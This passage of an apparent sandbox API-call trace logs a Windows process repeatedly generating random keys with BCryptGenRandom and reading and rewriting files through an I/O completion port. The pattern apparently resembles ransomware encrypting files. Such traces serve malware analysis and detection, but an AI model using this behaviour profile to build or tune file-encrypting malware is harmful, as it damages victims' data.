lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.685] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.697] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8b4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.698] CloseHandle (hObject=0x170) returned 1 [0167.698] free (_Block=0x3df0008) [0167.698] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.706] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.706] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0167.707] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.707] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0167.707] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.707] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.707] free (_Block=0x3e305b8) [0167.707] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.707] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.708] free (_Block=0x1fa91d0) [0167.708] free (_Block=0x1fa2ed8) [0167.708] free (_Block=0x1fa90b8) [0167.708] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.708] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.709] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3380, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.709] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.721] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x692, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.721] CloseHandle (hObject=0x170) returned 1 [0167.721] free (_Block=0x3df0008) [0167.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0167.730] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0167.731] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.731] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.731] free (_Block=0x3e305b8) [0167.731] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.731] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.731] free (_Block=0x1fa91d0) [0167.731] free (_Block=0x1fa2ed8) [0167.731] free (_Block=0x1fa90b8) [0167.731] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.733] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2830, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.744] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2108, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.745] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.745] CloseHandle (hObject=0x170) returned 1 [0167.745] free (_Block=0x3df0008) [0167.745] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.754] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.754] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0167.754] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.755] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0167.755] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.755] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.755] free (_Block=0x3e305b8) [0167.755] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.755] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.755] free (_Block=0x1fa91d0) [0167.756] free (_Block=0x1fa2ed8) [0167.756] free (_Block=0x1fa90b8) [0167.756] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.757] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.758] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.786] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2178, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.787] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.787] CloseHandle (hObject=0x170) returned 1 [0167.787] free (_Block=0x3df0008) [0167.787] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.805] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.806] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0167.806] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.806] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0167.807] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.807] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.807] free (_Block=0x3e305b8) [0167.807] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.807] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.807] free (_Block=0x1fa91d0) [0167.807] free (_Block=0x1fa2ed8) [0167.808] free (_Block=0x1fa90b8) [0167.808] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.808] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.818] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.819] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0167.819] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.820] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0167.820] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.820] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.820] free (_Block=0x3e305b8) [0167.820] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.820] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.821] free (_Block=0x1fa91d0) [0167.821] free (_Block=0x1fa2ed8) [0167.821] free (_Block=0x1fa90b8) [0167.821] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.828] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.829] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0167.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.830] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0167.830] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.830] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.830] free (_Block=0x3e305b8) [0167.830] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.830] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.831] free (_Block=0x1fa91d0) [0167.831] free (_Block=0x1fa2ed8) [0167.831] free (_Block=0x1fa90b8) [0167.831] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0167.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.846] CloseHandle (hObject=0x170) returned 1 [0167.846] free (_Block=0x3df0008) [0167.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.860] CloseHandle (hObject=0x308) returned 1 [0167.861] free (_Block=0x1ff1e60) [0167.861] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.874] CloseHandle (hObject=0x2a4) returned 1 [0167.875] free (_Block=0x3d70450) [0167.875] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.888] CloseHandle (hObject=0x3cc) returned 1 [0167.888] free (_Block=0x3f70048) [0167.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.899] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0167.900] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.912] CloseHandle (hObject=0x170) returned 1 [0167.913] free (_Block=0x3df0008) [0167.913] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.920] CloseHandle (hObject=0x308) returned 1 [0167.921] free (_Block=0x1ff1e60) [0167.921] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.921] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0167.921] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.940] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x608, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.950] CloseHandle (hObject=0x2a8) returned 1 [0167.950] free (_Block=0x3e70008) [0167.950] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.972] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.972] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.983] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x121c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0168.005] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.023] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0168.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.030] CloseHandle (hObject=0x2a4) returned 1 [0168.030] free (_Block=0x1ff1e60) [0168.030] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.036] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7e90, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0168.045] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.062] CloseHandle (hObject=0x3cc) returned 1 [0168.062] free (_Block=0x3df0008) [0168.062] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.065] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x211c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.066] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.067] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xa210, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0168.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.150] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.156] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.165] CloseHandle (hObject=0x2a8) returned 1 [0168.165] free (_Block=0x1ff1e60) [0168.165] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.176] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1764, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0168.187] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.197] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1e55, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0168.203] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.212] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.213] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0168.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.213] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: 